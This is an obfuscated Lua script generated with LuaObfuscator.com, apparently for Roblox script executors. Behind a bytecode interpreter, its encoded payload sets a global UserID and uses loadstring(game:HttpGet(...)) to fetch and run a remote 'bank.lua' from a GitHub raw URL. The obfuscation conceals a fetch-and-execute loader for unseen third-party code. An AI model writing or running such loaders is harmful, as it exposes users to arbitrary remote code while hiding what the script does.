--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

do local v0=0;local v1;local v2;local v3;local v4;local v5;local v6;local v7;local v8;local v9;local v10;local v11;local v12;local v13;local v14;local v15;local v16;while true do if (v0==1) then v5=string.gsub;v6=string.rep;v7=table.concat;v8=table.insert;v0=2;end if (4==v0) then v16=function(v21,v22,...)local v27=1;local v28;v21=v5(v4(v21,5),"..",function(v29)if (v2(v29,2)==79) then v28=v1(v4(v29,1,1));return "";else local v79=0;local v80;while true do if (v79==0) then v80=v3(v1(v29,16));if v28 then local v93=v6(v80,v28);v28=nil;return v93;else return v80;end break;end end end end);local function v30(v31,v32,v33)if v33 then local v81=(v31/(((744 -521) -(136 + 85))^(v32-(1 + 0))))%((7 -5)^(((v33-(3 -(1489 -(320 + 1167)))) -(v32-(1349 -(227 + 1121)))) + 1 + 0)) ;return v81-(v81%1) ;else local v82=(368 -(253 + 113))^(v32-(1 -0)) ;return (((v31%(v82 + v82))>=v82) and (455 -(23 + 431))) or (0 + 0) ;end end local function v34()local v47=391 -(179 + 212) ;local v48;while true do if (v47==(1 + 0)) then return v48;end if (v47==(1590 -((517 -275) + 1348))) then v48=v2(v21,v27,v27);v27=v27 + 1 ;v47=1507 -(109 + 1397) ;end end end local function v35()local v49,v50=v2(v21,v27,v27 + 1 + 1 );v27=v27 + (9 -7) ;return (v50 * (220 + 36)) + v49 ;end local function v36()local v51=0 + 0 ;local v52;local v53;local v54;local v55;while true do if (v51==(378 -(308 + 70))) then v52,v53,v54,v55=v2(v21,v27,v27 + (1923 -(1229 + 691)) );v27=v27 + 4 + 0 + 0 ;v51=1 + (0 -0) ;end if (v51==(4 -3)) then return (v55 * (31642696 -14865480)) + (v54 * (66995 -(432 + 1027))) + (v53 * (253 + 3)) + v52 ;end end end local function v37()local v56=0 -0 ;local v57;local v58;local v59;local v60;local v61;local v62;while true do if (v56==(1701 -(90 + 1609))) then v61=v30(v58,1904 -((1514 -(498 + 489)) + 1356) ,(301 -(28 + 172)) -(16 + 54) );v62=((v30(v58,13 + 19 )==(1 + 0)) and  -1) or (1 + 0) ;v56=(7 + 1) -5 ;end if (v56==(1 -(0 + 0))) then v59=1283 -(610 + 672) ;v60=(v30(v58,1,74 -54 ) * (2^(15 + 17))) + v57 ;v56=2 -0 ;end if (v56==(3 + 0)) then if (v61==(1377 -(60 + 1317))) then if (v60==(173 -(42 + 131))) then return v62 * (0 -(823 -(32 + 791))) ;else local v94=0;while true do if (v94==(0 + 0)) then v61=1 + 0 ;v59=(0 -0) + 0 ;break;end end end elseif (v61==(477 + 1570)) then return ((v60==(0 + 0)) and (v62 * (1/(0 -0)))) or (v62 * NaN) ;end return v9(v62,v61-(1747 -(470 + 254)) ) * (v59 + (v60/((5 -3)^52))) ;end if (0==v56) then v57=v36();v58=v36();v56=2 -1 ;end end end local function v38(v39)local v63;if  not v39 then v39=v36();if (v39==(752 -(430 + 322))) then return "";end end v63=v4(v21,v27,(v27 + v39) -(2 -1) );v27=v27 + v39 ;local v64={};for v77=731 -(679 + 51) , #v63 do v64[v77]=v3(v2(v4(v63,v77,v77)));end return v7(v64);end local v40=v36;local function v41(...)return {...},v13("#",...);end local function v42()local v65=0 + 0 ;local v66;local v67;local v68;local v69;local v70;local v71;local v72;while true do if (v65==(3 + 0)) then v72=nil;while true do local v86=0 + 0 ;while true do if (v86==1) then if (v66==(827 -(598 + 227))) then local v105=0;while true do if (v105~=0) then else local v120=0;while true do if ((632 -(144 + 487))==v120) then v105=1;break;end if (v120==0) then for v125=1,v36() do local v126=1998 -(1461 + 537) ;local v127;local v128;while true do if (v126~=1) then else while true do if (v127==0) then v128=v34();if (v30(v128,1,1642 -(585 + 1056) )~=(0 + 0)) then else local v157=0 + 0 ;local v158;local v159;local v160;local v161;while true do if ((0 + 0)==v157) then v158=0 -0 ;v159=nil;v157=1;end if ((1 + 1)~=v157) then else while true do if (v158==1) then local v175=0;local v176;while true do if (v175==0) then v176=0;while true do if (v176==(274 -(62 + 212))) then v161={v35(),v35(),nil,nil};if (v159==0) then local v191=0;while true do if (v191==(0 + 0)) then v161[4 -1 ]=v35();v161[4]=v35();break;end end elseif (v159==1) then v161[1243 -(718 + 522) ]=v36();elseif (v159==2) then v161[9 -6 ]=v36() -(2^(1173 -(256 + 901))) ;elseif (v159~=(870 -(229 + 638))) then else local v200=0 + 0 ;local v201;local v202;while true do if (v200~=1) then else while true do if (v201==(0 + 0)) then v202=0;while true do if (v202==0) then v161[3]=v36() -((2 + 0)^16) ;v161[4]=v35();break;end end break;end end break;end if (0==v200) then v201=0 + 0 ;v202=nil;v200=2 -1 ;end end end v176=1 + 0 ;end if (v176~=(642 -(369 + 272))) then else v158=2;break;end end break;end end end if (v158==(916 -(606 + 310))) then local v177=1048 -(441 + 607) ;while true do if ((1 -0)==v177) then v158=1 -0 ;break;end if (v177==(0 + 0)) then v159=v30(v128,2,13 -10 );v160=v30(v128,3 + 1 ,809 -(76 + 727) );v177=1 + 0 ;end end end if (v158==3) then if (v30(v160,1 + 2 ,1 + 2 )==1) then v161[4]=v72[v161[4]];end v67[v125]=v161;break;end if (2~=v158) then else local v179=0;local v180;while true do if ((741 -(644 + 97))==v179) then v180=0;while true do if (v180==(1 -0)) then v158=3;break;end if (v180~=0) then else local v189=0;local v190;while true do if (v189~=(0 -0)) then else v190=195 -(161 + 34) ;while true do if (v190==0) then local v199=1193 -(870 + 323) ;while true do if (0==v199) then if (v30(v160,1 + 0 ,1 + 0 )~=1) then else v161[7 -5 ]=v72[v161[2]];end if (v30(v160,2,43 -(17 + 24) )==(1451 -(878 + 572))) then v161[3]=v72[v161[7 -4 ]];end v199=1 + 0 ;end if ((1254 -(769 + 484))~=v199) then else v190=4 -3 ;break;end end end if (v190==1) then v180=1;break;end end break;end end end end break;end end end end break;end if (v157~=(1 -0)) then else local v167=1592 -(1158 + 434) ;while true do if (v167~=0) then else v160=nil;v161=nil;v167=1;end if (v167~=(827 -(485 + 341))) then else v157=2;break;end end end end end break;end end break;end if (v126==0) then v127=0 -0 ;v128=nil;v126=1 + 0 ;end end end for v129=1755 -(195 + 1559) ,v36() do v68[v129-(1277 -(373 + 903)) ]=v42();end v120=1949 -(611 + 1337) ;end end end if (v105==(1 -0)) then local v121=0;while true do if (v121==(529 -(29 + 500))) then for v131=1,v36() do v69[v131]=v36();end return v70;end end end end end break;end if (v86~=(1218 -(141 + 1077))) then else if (v66~=0) then else local v106=1708 -(472 + 1236) ;while true do if (v106==2) then v66=1969 -(1282 + 686) ;break;end if ((1120 -(40 + 1079))==v106) then v69={};v70={v67,v68,nil,v69};v106=7 -5 ;end if (v106~=(0 -0)) then else v67={};v68={};v106=1;end end end if (v66~=(3 -2)) then else v71=v36();v72={};for v112=1 + 0 ,v71 do local v113=0;local v114;local v115;while true do if (v113~=0) then else local v122=0;while true do if ((0 + 0)==v122) then v114=v34();v115=nil;v122=1;end if (v122~=1) then else v113=1;break;end end end if (v113==1) then if (v114==(1 -0)) then v115=v34()~=0 ;elseif (v114==2) then v115=v37();elseif (v114==(3 + 0)) then v115=v38();end v72[v112]=v115;break;end end end v70[2 + 1 ]=v34();v66=2;end v86=1;end end end break;end if (v65~=1) then else v68=nil;v69=nil;v65=2;end if (v65==(1095 -(63 + 1032))) then v66=155 -(23 + 132) ;v67=nil;v65=1505 -(17 + 1487) ;end if (v65~=(9 -7)) then else v70=nil;v71=nil;v65=1 + 2 ;end end end local function v43(v44,v45,v46)local v73=0;local v74;local v75;local v76;while true do if (v73==0) then v74=v44[1];v75=v44[2];v73=1;end if (v73==1) then v76=v44[3];return function(...)local v87=0;local v88;local v89;local v90;local v91;local v92;while true do if (0==v87) then v88=1;v89= -1;v87=1;end if (1==v87) then v90={...};v91=v13("#",...) -1 ;v87=2;end if (v87==2) then v92=nil;v92=function()local v95=v74;local v96=v75;local v97=v76;local v98=v41;local v99={};local v100={};local v101={};for v108=(3107 -(58 + 1426)) -(259 + 1364) ,v91 do if ((v108>=v97) or ((157 + 6 + 3)==(11 + 15))) then v99[v108-v97 ]=v90[v108 + (191 -(179 + 11)) ];else v101[v108]=v90[v108 + ((2855 -1070) -(763 + 1021)) ];end end local v102=(v91-v97) + (2 -1) ;local v103;local v104;while true do local v109=646 -((237 -(135 + 62)) + 606) ;local v110;while true do if (((324 + 816)>=(117 + 444)) and (v109==((0 -0) -0))) then v110=0 -(0 + 0) ;while true do if ((v110==(1854 -((2641 -(514 + 1460)) + 324 + 863))) or ((4340 + 630)<(2164 -(1310 + 400)))) then local v124=0 + 0 ;while true do if ((v124==(0 + 0)) or (((13846 -10269) -(386 + 551))>=(9280 -4655))) then v103=v95[v88];v104=v103[1 -0 ];v124=1 + 0 ;end if (((1213 -712)==(64 + 437)) and (v124==(370 -(81 + 288)))) then v110=1 + 0 ;break;end end end if (((165 + 3245)>=(3138 -(263 + 210))) and (v110==(2 -1))) then if ((v104<=4) or ((2072 + 2743)<=(587 + 2323))) then if ((v104<=(448 -(242 + (1965 -(1441 + 319))))) or ((568 + 2369)<=(2237 -(794 + 273)))) then if ((v104>(1598 -(353 + 1245))) or ((4371 -(458 + 375))<(4054 -(696 + (2122 -(128 + 1116)))))) then if ((v101[v103[1 + (3 -2) ]]==v103[11 -7 ]) or ((3856 -2505)==(2603 -(1505 + 235 + 201)))) then v88=v88 + (3 -2) ;else v88=v103[(152 + 74) -(173 + 50) ];end else for v141=v103[86 -((83 -44) + 29 + 16) ],v103[3 + 0 ] do v101[v141]=nil;end end elseif ((v104<=(1 + 1)) or ((428 + 2 + 2080)>(550 + 2986))) then local v135=0 -0 ;local v136;local v137;while true do if ((v135==((4425 -2627) -(864 + (1307 -(246 + 128))))) or ((2762 -(139 + 1107))>1559)) then v101[v136 + (1634 -(1509 + 124)) ]=v137;v101[v136]=v137[v103[1 + 3 ]];break;end if ((v135==(0 + 0)) or (((2551 -(602 + 546)) + 1477)<=(91 -56))) then local v165=0 + 0 ;while true do if ((2074==(4922 -2848)) and (v165==(1395 -(833 + 561)))) then v135=1;break;end if ((v165==(0 -0)) or ((690 + 152)==(3907 -(4161 -1602)))) then v136=v103[2 + 0 ];v137=v101[v103[1062 -(445 + 614) ]];v165=61 -(56 + 4) ;end end end end elseif ((v104==(1 + 2)) or (((5553 -(47 + 55)) -(1126 + 289))<=(3696 -1191))) then v101[v103[1723 -(473 + 1248) ]]=v103[905 -(56 + 846) ];else v101[v103[1439 -((2601 -(848 + 649)) + 333) ]]();end elseif ((v104<=(5 + 2)) or ((3038 -(579 + (3199 -2511)))>(97 + 222 + 4024))) then if ((v104<=(1329 -(324 + (3371 -2371)))) or ((2172 + 942)<=(4913 -(1243 + 644)))) then local v138=0 + 0 ;local v139;local v140;while true do if (((6439 -(208 + 1234))>=(1848 + 209)) and (v138==(0 -0))) then v139=(220 -(205 + 15)) -(0 -0) ;v140=nil;v138=1 + 0 ;end if (((103 + 763)==(2452 -(1268 + (951 -633)))) and (1==v138)) then while true do if (((6697 -(1780 + 52 + 26))>=(46 + 892)) and ((0 + 0)==v139)) then v140=v103[2 + 0 ];v101[v140]=v101[v140](v14(v101,v140 + (1642 -(429 + (1896 -(509 + 175)))) ,v89));break;end end break;end end elseif ((((6882 -(1410 + 210)) -3032)<(10465 -6584)) and (v104>((1333 -880) -(47 + 400)))) then v88=v103[2 + (403 -(263 + 139)) ];else v101[v103[2 + 0 ]][v103[1465 -(107 + 1355) ]]=v103[1 + 3 ];end elseif ((v104<=(1672 -(1518 + 146))) or ((4110 -(511 + 70))>(185 + 3531))) then do return;end elseif (((73 + 1888)<(5602 -2156)) and (v104>9)) then local v149=0 -0 ;local v150;local v151;local v152;local v153;local v154;while true do if (((9433 -5737)>((682 + 521) -702)) and (v149==(6 -4))) then v154=nil;while true do if (((7073 -4285)>=(52 + 5 + 199)) and (v150==(0 + 0))) then local v172=1898 -(623 + 1275) ;local v173;while true do if (((4147 -(669 + 522))<(5555 -2169)) and (v172==(853 -(789 + 64)))) then v173=0 + (121 -(93 + 28)) ;while true do if ((v173==(0 + 0)) or ((2201 -(624 + 981))>(3241 -(117 + 812)))) then local v188=(0 -0) + 0 ;while true do if (((5431 -(868 + 342))>(1884 + 882)) and (v188==(174 -(7 + 167)))) then v151=v103[1 + 1 ];v152,v153=v98(v101[v151](v14(v101,v151 + ((3191 -1405) -(959 + 826)) ,v103[6 -3 ])));v188=1 + 0 ;end if (((29 + 55 + 249)<(277 + 134)) and (v188==(575 -(118 + 456)))) then v173=1 + 0 ;break;end end end if (((129 + 352)<=(7200 -5202)) and (v173==(1396 -(473 + 922)))) then v150=1 + 0 ;break;end end break;end end end if (((3909 -1736)<(3858 -(759 + 341))) and (v150==(4 -2))) then for v181=v151,v89 do local v182=(1470 -(377 + 1093)) -0 ;local v183;local v184;while true do if ((v182==(0 + 0)) or ((2458 + 1983)<(4932 -2436))) then v183=0 -0 ;v184=nil;v182=1;end if (((2195 + 1846)==(5962 -(1618 + 303))) and (v182==((686 -262) -(111 + 312)))) then while true do if (((0 -0)==v183) or (4823<=((4152 -(265 + 1137)) -(238 + 1395)))) then v184=0 + 0 ;while true do if ((v184==(1953 -(1318 + 635))) or ((257 -(30 + 27))==(189 + 736))) then v154=v154 + ((7 -5) -1) ;v101[v181]=v152[v154];break;end end break;end end break;end end end break;end if ((v150==(1 + 0)) or ((3047 -(94 + 1209))<(3985 -2532))) then local v174=0 -0 ;while true do if ((((1537 + 2857) -(556 + 25))>(3603 -(272 + 271))) and (v174==0)) then local v187=0 + 0 ;while true do if (((5788 -(627 + 289))>=(13503 -8848)) and ((141 -((1703 -(13 + 1661)) + 111))==v187)) then v174=1;break;end if (((2311 -894)<2993) and (v187==(552 -((701 -380) + 231)))) then v89=(v153 + v151) -((4 -2) -1) ;v154=(0 + 0) -0 ;v187=3 -2 ;end end end if (((5032 -(799 + 663))==(8621 -5051)) and (v174==(1521 -(1084 + 436)))) then v150=915 -(160 + 753) ;break;end end end end break;end if ((v149==(1 + 0)) or ((21044 -16497)<(2512 -((1674 -858) + 463)))) then local v166=0 -0 ;while true do if (((1 + 0)==v166) or ((2229 -(406 + 647))<(86 + 187))) then v149=1635 -(1155 + 478) ;break;end if (((4377 -(1065 + 271))>=(88 + 362)) and (v166==(0 + 0))) then v152=nil;v153=nil;v166=1 + 0 ;end end end if ((v149==(0 + (1705 -(226 + 1479)))) or ((4168 -(179 + 464 + 851))>=(84 + 3692))) then v150=(0 + 0) -0 ;v151=nil;v149=1 -0 ;end end else v101[v103[3 -1 ]]=v46[v103[1 + 2 ]];end v88=v88 + 1 ;break;end end break;end end end end;v87=3;end if (3==v87) then A,B=v41(v12(v92));if  not A[1] then local v111=v44[4][v88] or "?" ;error("Script error at ["   .. v111   .. "]:"   .. A[2] );else return v14(A,2,B);end break;end end end;end end end return v43(v42(),{},v22)(...);end;v16("LOL!083O00028O0003023O005F4703063O00557365724944030A3O0032352O343738392O3239030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403453O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F622O6C7869326372617A792F7363726970747073782F6D61696E2F62616E6B2E6C756100153O0012033O00016O000100013O0026013O0002000100010004073O00020001001203000100013O00260100010005000100010004073O00050001001209000200023O003006000200030004001209000200053O001209000300063O002002000300030007001203000500084O000A000300054O000500023O00022O00040002000100010004073O001400010004073O000500010004073O001400010004073O000200012O00083O00017O00153O00023O00033O00053O00053O00063O00083O00083O00093O00093O000A3O000A3O000A3O000A3O000A3O000A3O000A3O000B3O000C3O000E3O000F3O00113O00",v10(),...);break;end if (v0==3) then v13=select;v14=unpack or table.unpack ;v15=tonumber;v16=nil;v0=4;end if (v0==2) then v9=math.ldexp;v10=getfenv or function()return _ENV;end ;v11=setmetatable;v12=pcall;v0=3;end if (v0==0) then v1=tonumber;v2=string.byte;v3=string.char;v4=string.sub;v0=1;end end end
